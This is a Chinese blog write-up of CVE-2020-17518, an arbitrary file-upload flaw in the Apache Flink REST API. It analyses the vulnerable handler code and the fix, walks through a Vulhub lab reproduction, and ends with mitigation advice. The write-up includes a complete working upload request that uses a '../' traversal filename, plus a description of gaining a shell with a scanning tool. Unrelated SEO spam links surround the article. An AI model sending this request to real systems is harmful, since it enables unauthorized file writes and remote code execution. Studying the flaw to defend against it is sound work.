当前位置: 首页 > news >正文

工作网哪个平台可靠关键词优化怎么操作

工作网哪个平台可靠,关键词优化怎么操作,免费推广网站方法大集合,优化电池充电有必要开吗漏洞概述 漏洞名称:Apache Flink REST API 任意文件上传漏洞 漏洞编号:CVE-2020-17518 CVSS 评分:7.5 影响版本:Apache Flink 1.5.1 - 1.11.2 修复版本:≥ 1.11.3 或 ≥ 1.12.0 漏洞类型:路径遍历导致的任…

漏洞概述

漏洞名称:Apache Flink REST API 任意文件上传漏洞
漏洞编号:CVE-2020-17518
CVSS 评分:7.5
影响版本:Apache Flink 1.5.1 - 1.11.2
修复版本:≥ 1.11.3 或 ≥ 1.12.0
漏洞类型:路径遍历导致的任意文件写入
根本原因:REST API 处理文件上传时未对 filename 参数进行路径规范化校验,导致攻击者可通过 ../ 实现目录穿越,将文件写入任意路径。


技术细节与源码分析

1. 漏洞触发原理

攻击者向 Flink 的 /jars/upload 接口提交恶意构造的 multipart/form-data 请求,在 filename 参数中注入路径遍历序列(如 ../../../tmp/pwned),绕过安全校验将文件写入非预期目录。

2. 关键源码定位

漏洞类org.apache.flink.runtime.rest.handler.job.JarUploadHandler
漏洞方法handleRequest()

// 源码路径: flink-runtime/src/main/java/org/apache/flink/runtime/rest/handler/job/JarUploadHandler.java  
@Overrideprotected CompletableFuture<JarUploadResponseBody> handleRequest(@Nonnull final HandlerRequest<EmptyRequestBody, EmptyMessageParameters> request,@Nonnull final RestfulGateway gateway) throws RestHandlerException {Collection<File> uploadedFiles = request.getUploadedFiles();if (uploadedFiles.size() != 1) {throw new RestHandlerException("Exactly 1 file must be sent, received " + uploadedFiles.size() + '.', HttpResponseStatus.BAD_REQUEST);}final Path fileUpload = uploadedFiles.iterator().next().toPath();return CompletableFuture.supplyAsync(() -> {if (!fileUpload.getFileName().toString().endsWith(".jar")) {throw new CompletionException(new RestHandlerException("Only Jar files are allowed.",HttpResponseStatus.BAD_REQUEST));} else {final Path destination = jarDir.resolve(UUID.randomUUID() + "_" + fileUpload.getFileName());//未过滤路径遍历字符  try {Files.move(fileUpload, destination);//  执行文件写入} catch (IOException e) {throw new CompletionException(new RestHandlerException(String.format("Could not move uploaded jar file [%s] to [%s].",fileUpload,destination),HttpResponseStatus.INTERNAL_SERVER_ERROR,e));}return new JarUploadResponseBody(destination.normalize().toString());}}, executor);

漏洞点分析
1.fileUpload.getFileName()

  • 直接使用用户输入的原始文件名(如 ../../../evil.jar

  • 未进行路径过滤或规范化处理

2.jarDir.resolve() 路径拼接

  • resolve()方法会将用户输入路径与系统路径拼接

  • 攻击者可构造 ../../etc/cron.d/pwn 实现目录穿越

3.Files.move() 文件写入

  • 无权限校验,直接写入目标路径

  • 服务进程通常以高权限(root)运行,可覆盖系统文件


3. 官方修复方案

修复提交:a5264a6f4152
修复代码

// 修复后:使用 getName() 剥离路径信息  
String fileName = new File(fileUpload.getFilename()).getName(); // 仅保留文件名  
Path dest = Paths.get(uploadDir).resolve(fileName);  

修复效果

  • getName() 方法提取文件名(如 ../../pwn.txtpwn.txt),阻断目录穿越。
  • 增加路径规范化逻辑,拒绝包含 .. 的输入。

漏洞复现

环境搭建

1.使用 Vulhub 环境启动漏洞靶机
 docker-compose up -d 

在这里插入图片描述

2.访问访问 http://target:8081,确认服务正常运行

在这里插入图片描述

攻击步骤

上传文件
1.发送如下数据包,即可上传一个文件到目标服务器的 /tmp/success 位置:
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

在这里插入图片描述

2.进入容器中验证
docker exec -it 容器id  /bin/bash

在这里插入图片描述

  • 上传成功
getshell
1.下载工具Goby
2.打开工具扫描靶机

在这里插入图片描述

  • 发现漏洞
3. 验证漏洞

在这里插入图片描述

4.成功getshell

在这里插入图片描述

  • getshell的原理应该是通过拼接路径,上传恶意jar包到/tmp/flink-web-*/flink-web-upload/目录下,即可执行反弹shell的命令。
  • 相比通过Submit New Job处上传jar包,通过利用CVE-2020-17518漏洞上传的jar包,并不会在前台显示,因此具有一定的隐蔽性。

修复与缓解建议

  1. 官方升级:升级至 Flink ≥ 1.11.3 或 ≥ 1.12.0。
  2. 临时加固
    • 禁用未使用的REST API(如 jobmanager/jars/upload)。
    • 部署WAF规则拦截 filename 中的 ../ 或空字符(%00)。
  3. 权限控制:以低权限账户运行Flink服务,限制目录写入范围。

总结

CVE-2020-17518 的根源在于 路径解析与用户输入的信任失衡。其利用链清晰展示了未过滤的用户输入如何通过路径遍历转化为RCE风险。修复需从代码层强化输入校验(如 getName() 剥离路径),并结合运行时防护(如权限最小化)。该漏洞的广泛利用(如Mirai僵尸网络)凸显了中间件安全在云原生架构中的关键性。


参考链接

  1. CVE-2020-17518 漏洞修复提交记录
  2. 漏洞原理与利用链分析(FreeBuf)
  3. 从文件上传到一键GetShell实战(天达云)
  4. Windows环境复现指南(FreeBuf)
http://www.cadmedia.cn/news/16700.html

相关文章:

  • 安康市城市建设局网站seo查询seo优化
  • 张家港网站设计制作大连网站排名推广
  • 视觉中国网站建设公司营销课程
  • 苏州住房和城乡建设局网站阿里巴巴国际站官网
  • 网站建设提供资料表seo兼职
  • 网站客服工作内容企业管理培训机构
  • 石家庄外贸公司网站设计公司网站推广优化方法
  • 曰本真人性做爰免费网站长沙seo管理
  • 安顺网站建设兼职黑马培训机构可靠吗
  • 目前最先进的网站建设技术广州做seo的公司
  • wordpress外汇主题手机系统优化软件哪个好
  • 建设网站公司 优帮云seo三人行论坛
  • 绥化市建设局官方网站惠州网络推广平台
  • 推广产品的软文郑州seo网站有优化
  • 怀化 网站建设seo搜索优化网站推广排名
  • 宁波网站建设公司推荐易企网网上打广告有哪些软件
  • 网站建设的cms系统360识图
  • 河南中恒诚信建设有限公司网站站长素材官网
  • 电子商务网站建设策划说沈阳关键词优化费用
  • 全球最大的平面设计网站网络营销推广策略
  • 营销广告策划方案江门关键词优化公司
  • 建站系统北京外包seo公司
  • 摄影工作室网站建设模板南京seo公司教程
  • 视频制作专业软件seo外链工具源码
  • 官方网站下载打印机驱动农产品网络营销
  • 网站建设app杭州谷歌优化推广
  • 怎么做网站的跳转软文代发布
  • 网络推广公司司萌新seo
  • 做AE视频素材在哪些网站上可以找零售客户电商网站
  • 自己做优惠劵网站赚钱吗汕头seo外包公司